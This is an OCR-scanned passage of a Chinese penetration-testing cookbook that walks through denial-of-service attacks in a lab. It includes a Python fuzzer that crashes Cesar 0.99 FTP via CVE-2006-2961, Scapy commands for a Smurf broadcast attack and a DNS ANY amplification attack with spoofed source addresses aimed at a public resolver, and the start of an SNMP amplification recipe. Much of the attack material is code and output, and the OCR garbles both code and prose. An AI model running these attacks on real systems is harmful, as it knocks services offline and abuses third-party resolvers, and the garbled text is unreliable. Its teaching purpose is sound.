有 一 个 公开 披露 的 漏洞 与 Cesar 0.99 FTP 服务 相关 。 此 漏洞 由 常见 漏洞 和 披露 
(CVE) 编号 系统 定义 为 CVE-2006-2961 » 通过 对 此 漏洞 进行 研究 ， 显 然 可 以 通 
过 向 MKD 有 也 数 发 送 换行 字符 的 验证 后 序列 ， 来 触发 基于 栈 的 缓冲 区 溢出 。 为 了 避 


免 将 N n 转 义 序列 传递 给 Python 脚本 ， 以 及 之 后 在 提供 的 输入 中 正确 解释 它 的 相 
关 困 难 ， 我 们 应 该 修改 先前 秘籍 中 讨论 的 脚本 。 然后 ， 我 们 可 以 使 用 修改 的 脚本 来 
利用 此 现 有 漏洞 : 


#!/usr/bin/python 


import socket 
import sys 


if len(sys.argv) != 5: 

print "Usage - ./ftp_fuzz.py [Target-IP] [Port Number] [Inte 
rval] [Maximum]" 

Drink "Example - =. /Ttplruzz py 10.0-0-5 2T 100 1000" 

print "Example will fuzz the defined FTP service with a seri 
es of line break " 

print "characters to include 100 '\\n's, 200 '\\n's, etc... 
up to the maximum of 1000" 

sys.exit() 


target = str(sys.argv[i] ) 

port = int(sys.argv[2]) 

i = int(sys.argv[3]) 

interval = int(sys.argv[3]) 

max = int(sys.argv[4]) 

user = raw_input(str("Enter ftp username: ")) 

passwd = raw_input(str("Enter ftp password: ")) 

command = raw_input(str("Enter FTP command to fuzz: ")) 


while i <= max: 
Erny: 
payload = command + " " + ('\n' * i) 
print "Sending " + str(i) + " line break characters to t 
arget" 
s-socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect=s.connect((target, port) ) 
.recv(1024) 
.send('USER ' + user + '\r\n') 
.recv(1024) 
.send('PASS ' + passwd + '\r\n') 
.recv(1024) 
.send(payload + '\r\n') 
.send( 'QUIT\r\n') 
.recv(1024) 
.close() 
i = i+ interval 
except: 
print "\nUnable to send...Server may have crashed" 
sys.exit() 


NNNnnn 


print "\nThere is no indication that the server has crashed" 


对 脚本 所 做 的 修改 包括 ， 人 和 修改 使 用 描述 和 删除 作为 提供 的 参数 的 载荷 ， 然 后 将 换行 
载荷 硬 编码 到 要 按 顺 序 发 送 的 脚本 中 。 


root@KaliLinux:~# ./ftp fuzz.py 

Usage - ./ftp fuzz.py [Target-IP] [Port Number] [Interval] [Maxi 
mum ] 

Example - ./ftp fuzz.py 10.0.0.5 21 100 1000 

Example will fuzz the defined FTP service with a series of line 
break characters to include 100 '\n's, 200 '\n's, etc... up to t 
he maximum of 1000 

root@KaliLinux:~# ./ftp fuzz.py 172.16.36.134 21 100 1000 

Enter ftp username: anonymous 

Enter ftp password: user@mail.com 

Enter FTP command to fuzz: MKD 

Sending 100 line break characters to target 

Sending 200 line break characters to target 

Sending 300 line break characters to target 

Sending 400 line break characters to target 

Sending 500 line break characters to target 

Sending 600 line break characters to target 

Sending 700 line break characters to target 

^C 

Unable to send...Server may have crashed 


如 果 脚 本 在 没有 适当 数量 的 系统 参数 的 情况 下 执行 ， 脚 本 将 返回 预期 的 用 法 。 然 
后 ， 我 们 可 以 执行 脚本 并 发 送 一 系列 载荷 ， 它 们 的 数量 为 100 的 倍数 ， 最 大 为 
1000。 在 发 送 700 个 换行 符 的 载荷 后 ， 脚 本 停止 发 送 载荷 ， 并 处 于 空闲 状态 。 在 
一 段 时 间 不 活动 后 ， 脚 本 使 用 Ctrl + C 被 强制 关闭 。 脚 本 表示 它 已 经 无 法 发 送 字 
符 ， 并 且 远 程 服务 器 可 能 已 经 前 溃 。 看 看 下 面 的 截图 : 





server exe has encountered a problem and needs to 
close. We are sorry for the mconvenience 


If you were in the maddie ol something, the information you were working on 
meght be lost 


Please tell Microsoft about this problem. 
We have created an eror report that you can send to us. We vli be 以 
thes report as confidential and anonymous 


To see what data thes enor report contains, cick here 


srt eet | [e] 


通过 返回 到 运行 Cesar 0.99 FTP 服务 的 Windows XP 主机 ， 我 们 可 以 看 
到 server.exe FR Mit T o 要 在 拒绝 服务 后 恢复 操作 ， 必 须 手 动 重新 启 
Cesar FTP 服务 。 


工作 原理 


一 般 来 说 ， 缓 冲 区 溢出 能 够 导致 拒绝 服务 ， 因 为 它们 可 能 导致 任意 数据 被 加 载 到 非 
预期 的 内 存 段 。 这 可 能 中 断 执行 流程 ， 并 导致 服务 或 操作 系统 崩溃 。 此 秘籍 中 讨 
论 的 特定 脚本 的 工作 原理 是 ， 在 服务 或 操作 系统 前 溃 的 情况 下 ， 和 套 接 字 将 不 再 接受 
输入 ， 并 且 脚 本 将 无 法 完成 整个 有 效 载 荷 注入 序列 。 如 果 发 生 这 种 情况 ， 脚 本 需要 
使 用 Ctrl + C 强制 关闭 。 在 这 种 情况 下 ， 脚 本 将 返回 一 个 标识 ， 表 明 后 续 载荷 无 
法 发 送 ， 并 且 服 务 器 可 能 已 前 溃 。 


6.3 Smurf DoS 攻击 


smurf 攻击 是 历史 上 用 于 执行 分 布 式 拒绝 服务 (DDoS) 放大 攻击 的 最 古老 的 技术 
之 一 。 此 攻击 包括 向 网 络 广播 地 址 发 送 一 系列 ICMP 回响 请 求 ， 带 有 伪造 的 源 IP 
地 址 。 当 广播 此 回 显 请 求 时 ，LAN 上 的 所 有 主机 会 同时 对 收 到 的 每 个 伪造 请 求 的 
目标 进行 回复 。 这 种 技术 对 现代 系统 的 效率 较 低 ， 因 为 大 多 数 系统 不 会 回复 PE 
向 的 广播 流量 。 


准备 


要 执行 smurf 攻 击 ， 您 需要 有 一 个 LAN， 上 面 运行 多 个 系统 。 提供 的 示例 将 Ubuntu 
用 作 扫 描 目标 。 有 关 设 置 Ubuntu 的 更 多 信息 ; 请 参阅 本 书 第 一 章 中 的 “安装 
Ubuntu Server" 秘 籍 。 


操作 步骤 


为 了 尝试 执行 传统 的 smurf 攻击 ，Scapy 可 以 用 于 从 零 开 始 构建 居 要 的 数据 包 。 为 
了 从 Kali Linux 命令 行使 用 Scapy， 请 从 终端 使 用 scapy 命令 ， 如 下 所 示 。 为 了 
向 广播 地 址 发 送 ICMP 请 求 ， 我 们 必须 首先 构建 此 请 求 的 层级 。 我 们 将 需要 构建 的 
第 一 层 是 IP 层 : 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
HHH [ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 
chksum= None 
Src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> i.dst = "172.16.36.255" 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos- 0x0 
len- None 
id- 1 
flags- 
frag- 0 
ttl- 64 
proto- ip 
chksum- None 
src- 172.16.36.224 
dst- 172.16.36.255 
\options\ 


要 构建 我 们 的 请 求 的 IP 层 ， 我 们 应 该 将 IP 对 象 赋 给 变量 i o 通过 调 

用 display() 函数 ， 我 们 可 以 确定 该 对 象 的 属性 配置 。 通常 ， 发 送 和 接收 地 址 都 
设 为 回 送 地 址 127.0.0.1 。 可 以 通过 将 i.dst 设置 为 广播 地 址 的 字符 串 值 ， 来 
更 改 目 标 地 址 并 修改 这 些 值 。 通 过 再 次 调用 display() 函数 ， 我 们 可 以 看 到 ， 不 
仅 更 新 了 目的 地 址 ， 而 且 Scapy 也 会 自动 将 源 IP 地 址 更 新 为 与 默认 接口 相关 的 地 
Abo 现在 我 们 已 经 构建 了 请 求 的 IP 层 ， 我 们 应 该 继续 构建 ICMP 层 : 


>>> ping = ICMP() 
>>> ping.display() 
###[ ICMP ]### 
type= echo-request 
code= 0 
chksum= None 
id= 0x0 
seq= 0x0 


要 构建 我 们 的 请 求 的 ICMP 层 ， 我 们 将 使 用 与 IP 层 相 同 的 技术 。 默 认 情 况 下 ， 
ICMP 层 已 配置 为 执行 回 显 请 求 。 现 在 我 们 已 经 创建 了 IP 和 |ICMP 层 ， 我 们 需要 
通过 堆 王 这 些 层 来 构造 请 求 : 


>>> request = (i/ping) 
>>> request.display() 
HH#[ IP ]### 

version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl- 64 


proto- icmp 
chksum- None 
src- 172.16.36.224 
dst- 172.16.36.255 
\options\ 

###[ ICMP ]### 
type= echo-request 
code= 0 
chksum= None 
id= 0x0 
seq- 0x0 

>>> send(request) 


Sent 1 packets. 


"p VA 38 3d EASES > XE € IP fe ICMP E » 然后 可 以 将 这 些 层 及 赋 给 表 
示 整 个 请 求 的 新 变量 。 然后 可 以 调用 display() 子 数 来 查看 请 求 的 配置 。 一 旦 

建立 了 请 求 ， 就 可 以 将 其 传递 给 函数 。 可 以 使 用 Wireshark 3i TCPdump 等 数据 包 
捕获 工具 来 监控 结果 。 在 提供 的 示例 中 ，Wireshark 显示 ，LAN 上 的 两 个 IP 地 址 
响应 了 广播 回响 请 求 : 






rae 


1 DETUR i A 
Filter: |icmp. v 


| Expression... Clear 


No. Source Destination Protocol Info 

6 172.16.36.224 172.16. 36.255 TOMP Echo (ping) request 
7 172.16.36.1 172.16.36.224 ICMP Echo (ping) reply 
10 172.16.36.2 172.16.36.224 ICMP Echo (ping) reply 


实际 上 ， 两 个 响应 地 址 不 足以 执行 有 效 的 DoS 攻击 。 如 果 这 个 练习 复制 到 另 一 个 


具有 半 现 代 化 主机 的 实验 室 中 ， 结 果 很 可 能 是 类 似 的 。 在 有 足够 的 响应 地 址 来 触发 
拒绝 服务 的 情况 下 ， 源 地 址 将 需要 替换 为 了 攻击 目标 的 IP 地 址 : 





NO 


>>> send(IP(dst="172.16.36.255", src="172.16.36.135")/ ICMP(),cou 
nt=100, verbose=1) 


Sent 100 packets. 


在 提供 的 示例 中 ，Scapy 的 单行 命令 用 于 执行 与 之 前 讨论 的 相同 操作 ， 但 此 时 除 
外 ， 源 IP 地 址 被 伪造 为 LAN 上田 一 个 系统 的 地 址 。 此 外 ， count 可 用 于 按 顺 序 
发 送 多 个 请 求 。 


工作 原理 
放大 攻击 的 原理 是 利用 第 三 方 设备 ， 使 网 络 流量 压倒 目标 。 对 于 多 数 放 大 攻击 ， 必 
须 满 足 两 个 条 件 : 


e 用 于 执行 攻击 的 协议 不 验证 请 求 源 
e 来 自 所 使 用 的 网 络 功能 的 响应 应 该 显 着 大 于 用 于 请 求 它 的 请 求 。 


传统 smurf 攻击 的 效率 取决 于 LAN 上 响应 |P 定向 的 广播 流量 的 主机 。 这 种 主机 从 
目标 系统 的 伪造 IP 地 址 接收 ICMP 广播 回响 请 求 ， 然 后 针对 接收 到 的 每 个 请 求 同 
时 返回 ICMP 回响 应 答 。 


6.4 DNS X X DoS 攻击 


DNS 放大 攻击 通过 对 给 定 域 执行 所 有 类 型 记录 的 伪造 查询 ， 来 利用 开放 的 DNS 解 
析 器 。 通 过 同时 向 多 个 开放 的 解析 器 发 送 请 求 来 使 用 DDoS 组 件 ， 可 以 提高 这 种 
攻击 的 效率 。 


准备 
为 了 模拟 DNS 放大 攻击 ， 你 需要 有 一 个 本 地 名 称 服务 器 ， 或 知道 一 个 开放 和 可 公 


开 访 问 的 名 称 服务 器 的 IP 地 址 。 提供 的 示例 将 Ubuntu 用 作 扫 描 目 标 。 HARE 
Ubuntu 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Ubuntu Server" 秘 籍 。 


操作 步骤 


为 了 了 解 DNS 放大 的 工作 原理 ， 可 以 使 用 基本 的 DNS 查询 工具 ， 
如 host > dig X nslookup ° 通过 对 与 已 建立 的 域 相关 的 所 有 记录 类 型 执行 
请 求 ， 你 将 注意 到 一 些 请 求 返 回 了 相当 大 的 响应 : 


root@KaliLinux:~# dig ANY google.com @208.67.220.220 


; <<>> DiG 9.8.4-rpz2*r1005.12-P1 <<>> ANY google.com 0208.67.22 
0.220 

;; global options: +cmd 

;; Got answer: 

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41539 

;; flags: qr rd ra; QUERY: 1, ANSWER: 17, AUTHORITY: 0, ADDITION 
AL: 0 

;; QUESTION SECTION: ; 


google.com. IN ANY 

;, ANSWER SECTION: 

google.com. 181 IN A 74.125.232.101 
google.com. 181 IN A 74.125.232.97 
google.com. 181 IN A 74.125.232.102 
google.com. 181 IN A 74.125.232.99 
google.com. 181 IN A 74.125.232.104 
google.com. 181 IN A 74.125.232.96 
google.com. 181 IN A 74.125.232.100 
google.com. 181 IN A 74.125.232.103 
google.com. 181 IN A 74.125.232.105 
google.com. 181 IN A 74.125.232.98 
google.com. 181 IN A 74.125.232.110 
google.com. 174 IN AAAA 2607:f8b0:4004:803::1007 
google.com. 167024 IN NS ns2. 
google.com. 

google.com. 167024 IN NS nsi. 
google.com. 

google.com. 167024 IN NS ns3. 
google.com. 

google.com. 167024 IN NS ns4. 
google.com. 

google.com. 60 IN SOA nsi. 


google.com. dns-admin. 
google.com. 1545677 7200 1800 1209600 300 


;; Query time: 7 msec 

;; SERVER: 208.67.220.220#53(208.67.220.220) 
;; WHEN: Thu Dec 19 02:40:16 2013 

;; MSG SIZE rcvd: 35 


在 提供 的 示例 中 ， 与 google.com 域 相关 的 所 有 记录 类 型 的 请 求 返 回 了 一 个 响 

应 ， 包 含 11 个 A 记录 ，1 个 AAAA 记 录 ，4 个 NS 记录 和 1 个 SOA 记 录 。 DNS 放大 攻击 
的 效率 与 响应 大 小 直接 相关 。 我 们 现在 将 尝试 使 用 Scapy 中 构建 的 数据 包 执行 相 

同 的 操作 。 要 发 送 我 们 的 DNS 查询 请 求 ， 我 们 必须 首先 构建 此 请 求 的 层级 。 我们 
需要 构建 的 第 一 层 是 IP 层 : 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
HHH IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 


chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> j.dst = "208.67.220.220" 
>>> i.display() 
###[ IP ]### 
version- 4 


ihl- None 
tos- 0x0 
len- None 
id- 1 
flags- 
frag- 0 
ttl- 64 
proto- ip 


chksum- None 

src= 172.16.36.180 
dst- 208.67.220.220 
\options\ 


要 构建 我 们 的 请 求 的 IP 层 ， 我 们 应 该 将 IP 对 象 赋 给 变量 i o 通过 调 

用 display() 函数 ， 我 们 可 以 确定 该 对 象 的 属性 配置 。 通常 ， 发 送 和 接收 地 址 都 
设 为 回 送 地 址 127.0.0.1 。 可 以 通过 将 i.dst 设置 为 广播 地 址 的 字符 串 值 ， 来 
更 改 目 标 地 址 并 修改 这 些 值 。 通 过 再 次 调用 display() 函数 ， 我 们 可 以 看 到 ， 不 
仅 更 新 了 目的 地 址 ， 而 且 Scapy 也 会 自动 将 源 IP 地 址 更 新 为 与 默认 接口 相关 的 地 
址 。 现在 我 们 已 经 构建 了 请 求 的 IP 层 ， 我 们 应 该 继续 构建 UDP 层 : 


>>> u = UDP() 

>>> u.display() 

###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 

>>> u.dport 53 


要 构建 我 们 的 请 求 的 UDP 层 ， 我 们 将 使 用 与 IP 层 相同 的 技术 。 在 提供 的 示例 

T^» UDP HARAT u 变量 。 如 前 所 述 ， 可 以 通过 调用 display() HARA 

定 默 认 配 置 。 在 这 里 ， 我 们 可 以 看 到 源 和 目标 端口 的 默认 值 都 列 为 domain 。 您 
可 能 能 猜 到 ， 这 表示 与 端口 53 相关 的 DNS 服 务 。DNS 是 一 种 常见 的 服务 ， 通 常 

可 以 在 网 络 系统 上 发 现 。 要 确认 这 一 点 ， 我 们 可 以 通过 引用 变量 名 和 属性 直接 调用 
该 值 。 了 既然 已 经 构建 了 IP 和 UDP 层 ， 我 们 需要 构建 DNS 层 : 


>>> d = DNS() 
>>> d.display() 
###[ DNS ]### 

id= 0 

qr= 0 

opcode= QUERY 

aa= 0 

tc= 0 

rd= 0 

ra= 0 
z- 0 
rcode- ok 
qdcount= 
ancount= 
nscount= 
arcount= 
qd= None 
an= None 
ns= None 
ar= None 


DODD 


为 了 构建 我 们 的 请 求 的 DNS 层 ， 我 们 将 使 用 与 IP 和 UDP 层 相 同 的 技术 。 在 提供 
的 示例 中 ，DNS EST d 变量 。 如 前 所 述 ， 可 以 通过 调用 display() BA 
来 确定 默认 配置 。 在 这 里 ， 我 们 可 以 看 到 有 几 个 值 需要 修改 : 


>>> d.rd = 

>>> d.qdcount = 1 
>>> d.display() 
###[ DNS ]### 


id= 0 

qr= 0 
opcode- QUERY 
aa- 0 

tc- 0 

rd- 1 

ra= 0 

z- 0 
rcode= ok 
qdcount= 1 
ancount= 0 
nscount= 0 
arcount= 0 
qd= None 
an= None 
ns= None 
ar= None 


RD 位 需要 被 激活 ; 这 可 以 通过 将 rd 值 设置 为 1 来 实现 。 此 外 ， 需 要 

为 qdcount 提供 值 0x0001 ; 这 可 以 通过 提供 整数 值 1 来 完成 。 通 过 再 次 调 

用 display() Až > 我 们 可 以 验证 是 否 已 经 调整 了 配置 。 现 在 已 经 构建 了 |IP， 
UDP 和 DNS 层 ， 我 们 需要 构建 一 个 DNS 问题 记录 以 分 配给 qd 值 : 


>>> q = DNSQR() 

>>> q.display() 

###[ DNS Question Record ]### 
qname- '.' 
qtype= A 
qclass- IN 


为 了 构建 DNS 问题 记录 ， 我 们 将 使 用 与 IP，UDP 和 DNS 层 相 同 的 技术 。 在 提供 


ED A ee d s rue 
用 display() 函数 来 确定 默认 配置 。 在 这 里 ， 我 们 可 以 看 到 有 几 个 值 需 要 修改 : 


>>> q.qname = 'google.com' 
>>> q.qtype=255 
>>> q.display() 
###[ DNS Question Record ]### 
qname= 'google.com' 
qtype= ALL 
qclass= IN 


qname 值 需要 设置 为 要 查询 的 域 。 另 外 ， qtype 需要 通过 传递 一 个 整数 值 255 
来 设置 为 ALL 。 通 过 再 次 调用 display() 函数 ， 我 们 可 以 验证 是 否 已 经 调整 了 
配置 。 现 在 问题 记录 已 经 配置 完毕 ， 问 题记 录 对 象 应 该 典 给 DNS qd 值 : 


>>> d.qd = q 
>>> d.display() 
###[ DNS ]### 
id= 0 
qr= 0 
opcode= QUERY 
aa= 0 
tc= 0 
rd= 1 
ra= 0 
Z= 0 
rcode= ok 
qdcount= 1 
ancount= 0 
nscount- 0 
arcount= 0 
\qd\ 
|###[ DNS Question Record ]### 
| 
qname- 'google.com' 
| 
qtype- ALL 
| 
qclass- IN 
an- None 
ns- None 
ar- None 


我 们 可 以 通过 调用 display() 元 数 来 验证 问题 记录 是 否 已 赋 给 DNS qd the 3L 
在 已 经 构建 了 IP，UDP 和 DNS 层 ， 并 且 已 经 将 相应 的 问题 记录 赋 给 DNS E” R 
NV] VGA IHR REE KWAK: 


>>> request = (i/u/d) 

>>> request.display() 

HH#[ IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= udp 


chksum= None 
src= 172.16.36.180 
dst= 208.67.220.220 
\options\ 
###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 
###[ DNS ]### 


id= 0 

qr= 0 

opcode= QUERY 
aa= 0 

tc= 0 

rd= 1 

ra= 0 

z- 0 

rcode- ok 
qdcount- 1 


ancount- 0 

nscount- 0 

arcount- 0 

\qd\ 
|###[ DNS Question Record ]### 
| qname= 'google.com' 


| qtype= ALL 
| qclass= IN 
an= None 
ns= None 
ar= None 


TVA SEL 27-08 Ee RES IP > UDP 和 DNS Be 然后 可 以 将 这 些 层 赋 给 
表示 整个 请 求 的 新 变量 。 然后 可 以 调用 display() 函数 来 查看 请 求 的 配置 。 在 
发 送 此 请 求 之 前 ， 我 们 应 该 以 相同 的 显示 格式 查看 它 ， 因 为 我 们 需要 查看 响应 。 这 
样 ， 我 们 可 以 更 好 地 从 视觉 上 理解 请 求 和 响应 之 间 发 生 的 放大 。 这 可 以 通过 直接 调 
用 变量 来 完成 : 


>>> request 


«IP frag-0 proto-udp dst-208.67.220.220 |«UDP sport=domain |<D 
NS rd=1 qdcount=1 qd-«DNSQR qname='google.com' qtype-ALL |» |» 
>> 


一 旦 建立 了 请 求 ， 它 就 可 以 被 传递 给 发 送 和 接收 函数 ， 以 便 我 们 可 以 分 析 响 应 。 我 
们 不 会 将 它 赋 给 一 个 变量 ， 而 是 直接 调用 该 函数 ， 以 便 可 以 以 相同 的 格式 查看 响 
应 : 


>>> sri(request) 
Begin emission: 


Received 50 packets, got 1 answers, remaining © packets 


«IP version=4L ihl-5L tos=0x0 len=378 id-29706 flags= frag=OL t 
t1=128 proto-udp chksum=0x4750 src-208.67.220.220 dst=172.16.36. 
232 options=[] |<UDP sport=domain dport=domain len=358 chksum=0 
xf360 |«DNS id=0 qr-iL opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0 
L rcode=ok qdcount=1 ancount=17 nscount=0 arcount=0 qd-«DNSQR q 
name-'google.com.' qtype-ALL qclass-IN |» an-«DNSRR rrname='goo 
gle.com.' type-A rclass-IN ttl1-188 rdata='74.125.228.103' |<DNSR 
R rrname-'google.com.' type=A rclass-IN ttl1-188 rdata='74.125.2 
28.102' |«DNSRR rrname-'google.com.' type-A rclass-IN ttl1-188 r 
data-'74.125.228.98' |«DNSRR rrname-'google.com.' type-A rclass 
-IN ttl=188 rdata='74.125.228.96' |«DNSRR rrname-'google. com." 
type-A rclass-IN ttl1-188 rdata-'74.125.228.99' |«DNSRR rrname- 
'google.com.' type-A rclass-IN ttl1-188 rdata='74.125.228.110' |< 
DNSRR rrname-'google.com.' type-A rclass-IN ttl1-188 rdata='74.1 
25.228.100' |«DNSRR rrname-'google.com.' type-A rclass-IN ttl-1 
88 rdata='74.125.228.97' |«DNSRR rrname-'google.com.' type-A rc 
lass-IN ttl1-188 rdata='74.125.228.104' |«DNSRR rrname-'google. 
com.' type-A rclass-IN ttl1-188 rdata='74.125.228.105' |«DNSRR r 
rname-'google.com.' type-A rclass-IN ttl1-188 rdata='74.125.228.1 
01' |«DNSRR rrname-'google.com.' type-AAAA rclass-IN ttl-234 rd 
ata-'2607 :f8b0:4004:803::1002' |«DNSRR rrname='google.com.' ty 
pe-NS rclass-IN ttl-171376 rdata-'ns2.google.com.' |«DNSRR rrna 
me-'google.com.' type=NS rclass-IN ttl-171376 rdata-'nsi.google. 
com.' |«DNSRR rrname-'google. com.' type=NS rclass-IN ttl-17137 
6 rdata-'ns3.google.com.' |«DNSRR rrname-'google.com.' type=NS 
rclass-IN ttl-171376 rdata-'ns4.google.com.' |«DNSRR rrname='go 
ogle.com.' type-SOA rclass-IN ttl-595 rdata='\xci\x06\ tdns-admi 
nNXCONXOCNXOONX17NXxd0 ^ NX00NXO0Nx1Cc. NX00NX00NX07NX08NX00NX12UN. xO 
O\XOO\xXOO\x01, ' |>>>>>>>>>>>>>>>>> ns=None ar=None |>>> 


该 响应 确认 了 我 们 已 成 功 构 建 所 需 的 请 求 ， 并 且 我 们 已 请 求 了 一 个 相当 大 的 有 效 内 
容 ， 其 中 包括 google.com 域 的 11 个 人 记录，1 个 AAAA 记 录 ，4 个 NS 记录 和 1 个 
SOA 记 录 。 此 练习 清楚 地 表明 ， 请 求 的 响应 明显 大 于 请 求 本 身 。 为 了 使 这 个 放大 


攻击 有 效 ， 它 需要 通过 伪造 源 IP 地 址 重 定 向 到 我 们 的 目标 : 


>>> i.src = "172.16.36.135" 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos- 0x0 
len- None 
id- 1 
flags- 
frag- 0 
ttl- 64 
proto- ip 
chksum- None 
Src- 172.16.36.135 
dst- 208.67.220.220 
NoptionsN 
>>> request = (i/u/d) 
>>> request 
«IP frag-0 proto-udp src-172.16.36.135 dst-208.67.220.220 |«UDP 
sport-domain |«DNS rd-i qdcount=1 qd-«DNSQR qname='google.co 
m' qtype-ALL |» |>>> 


将 源 IP 地 址 值 重 新 定义 为 目标 系统 的 IP 地 址 的 字符 串 后 ， 我 们 可 以 使 

用 display() 函数 确认 该 值 已 调整 。 然后 我 们 可 以 重建 我 们 的 更 改 后 的 请 求 。 
为 了 验证 我 们 是 否 能 够 将 DNS 查询 响应 重 定向 到 此 伪造 主机 ， 我 们 可 以 在 主机 上 
kz 2 TCPdump : 


admin@ubuntu:~$ sudo tcpdump -i ethO src 208.67.220.220 -vv 
[sudo] password for admin: 

tcpdump: listening on ethO, link-type EN10MB (Ethernet), capture 
size 65535 bytes 


在 提供 的 示例 中 ，TCPdump 配置 将 捕获 etho 接口 上 ， 来 
É 208.67.220.220 源 地 址 (查询 的 DNS 服务 器 的 地 址 ) 的 所 有 流量 。 然后 ， 我 
们 可 以 使 用 send() 函数 发 送 我 们 的 请 求 : 

>>> send(request) 


Sent 1 packets. 
>>> send(request) 


Sent 1 packets. 


发 送 请 求 后 ， 我 们 应 该 返回 到 TCPdump 的 内 容 ， 来 验证 DNS 查询 的 响应 是 否 返 
回 给 了 受害 服务 器 : 


tcpdump: listening on ethO, link-type EN10MB (Ethernet), capture 
size 65535 bytes 

19:07:12.926773 IP (tos OxO, ttl 128, id 11341, offset 0, flags 

[none], proto UDP (17), length 350) resolver2.opendns.com.domain 
> 172.16.36.135. domain: [udp sum ok] 0 q: ANY? google.com. 16/ 
0/0 google.com. A yyz08s13in-f4.1e100.net, google.com. A yyz08s1 
3-in-f5.1e100.net, google. com. A yyz08si3-in-f14.1e100.net, goo 
gle.com. A yyz08s13-in-f6.1e100. net, google.com. A yyz08s13-in- 
f2.1e100.net, google.com. A yyz08s13in-f0.1e100.net, google.com. 
A yyz08si13-in-f3.1e100.net, google.com. A yyz08s13-in-f1.1e100. 
net, google.com. A yyz08s13-in-f9.1e100.net, google. com. A yyzO 
8s13-in-f7.1e100.net, google.com. A yyz08s13-in-f8.1e100.net, go 
ogle.com. NS ns2.google.com., google.com. NS nsi.google.com., go 
ogle. com. NS ns3.google.com., google.com. NS ns4.google.com., g 
oogle.com. SOA nsi.google.com. dns-admin.google.com. 1545677 720 
0 1800 1209600 300 (322) 

19:07:15.448636 IP (tos OxO, ttl 128, id 11359, offset 0, flags 

[none], proto UDP (17), length 350) resolver2.opendns.com.domain 
> 172.16.36.135. domain: [udp sum ok] 0 q: ANY? google.com. 16/ 
0/0 google.com. A yyz08s13in-f14.1e100.net, google.com. A yyz08s 
13-in-f6.1e100.net, google.com. A yyz08s13-in-f2.1e100.net, goog 
le.com. A yyz08s13-in-f0.1e100.net, google. com. A yyz08s13-in-f 
3.1e100.net, google.com. A yyz08s13-in-f1.1e100. net, google.com 
. A yyz08s13-in-f9.1e100.net, google.com. A yyz08si3in-f7.1e100. 
net, google.com. A yyz08s13-in-f8.1e100.net, google.com. A yyz08 
s13-in-f4.1e100.net, google.com. A yyz08s13-in-f5.1e100.net, goo 
gle. com. NS ns2.google.com., google.com. NS nsi.google.com., go 
ogle.com. NS ns3.google.com., google.com. NS ns4.google.com., go 
ogle.com. SOA nsi. google.com. dns-admin.google.com. 1545677 720 
0 1800 1209600 300 (322) 


这 个 执行 DNS 放大 的 整个 过 程 ， 实 际 上 可 以 用 Scapy 中 的 单行 命令 来 执行 。 此 命 
令 使 用 所 有 与 上 一 个 练习 中 讨论 的 相同 的 值 。 然 后 可 以 修改 count 值 以 定义 要 发 
送 到 受害 服务 器 的 载荷 响应 数 : 


>>> send(IP(dstz"208.67.220.220",srcz"172.16.36.135") /UDP( )/DNS( 
rd=1,qdco unt-i,qd-DNSQR(qnamez"google.com",qtype-255)),verbose- 
1,count=2) 


Sent 2 packets. 


工作 原理 


放大 攻击 的 原理 是 利用 第 三 方 设备 ， 使 网 络 流量 压倒 目标 。 对 于 多 数 放 大 攻击 ， 必 
须 满 足 两 个 条 件 : 


。 用 于 执行 攻击 的 协议 不 验证 请 求 源 
e 来 自 所 使 用 的 网 络 功能 的 响应 应 该 显 着 大 于 用 于 请 求 它 的 请 求 。 


DNS 放大 攻击 的 效率 取决 于 DNS 查询 的 响应 大 小 。 另 外， 可 以 通过 使 用 多 个 
DNS 服务 器 来 增加 攻击 的 威力 。 


6.5 SNMP 放大 DoS x +È 


SNMP 扩展 攻击 通过 伪造 具有 大 型 响应 的 查询 ， 来 利用 团体 字符 串 可 预测 的 SNMP 
设备 。 通 过 使 用 分 布 式 DDoS 组 件 ， 以 及 通过 同时 向 多 个 SNMP 设备 发 送 请 求 ， 
可 以 提高 这 种 攻击 的 效率 。 


准备 


为 了 模拟 SNMP 放大 攻击 ， 你 需要 有 一 个 启用 SNMP 的 设备 。 所 提供 的 示例 使 用 
Windows XP 设备 。 有 关 设 置 Windows 系统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 
的 “安装 Windows Server" $54$ » 此 外 ， 此 秘籍 将 Ubuntu 用 作 扫 描 目 标 。 有 关 设 
置 Ubuntu 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Ubuntu Server $548 © 


操作 步骤 


为 了 开始 ， 我 们 应 该 初始 化 一 个 SNMP 查询 ， 使 其 返回 到 我 们 的 系统 ， 来 评估 要 
使 用 的 载荷 大 小 。 为 了 发 送 我 们 的 SNMP 查询 请 求 ， 我 们 必须 首先 构建 此 请 求 的 
层级 。 我 们 需要 构建 的 第 一 层 是 IP 层 : 


>>> i = IP() 

>>> i.display() 

HHH IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 


chksum= None 

src= 127.0.0.1 

dst= 127.0.0.1 

\options\ 
>>> i.dst = "172.16.36.134" 
>>> i.display() 
HHH [ IP ]### 

version= 4 


ihl= None 
tos- 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 


chksum= None 

src= 172.16.36.224 
dst= 172.16.36.134 
\options\ 


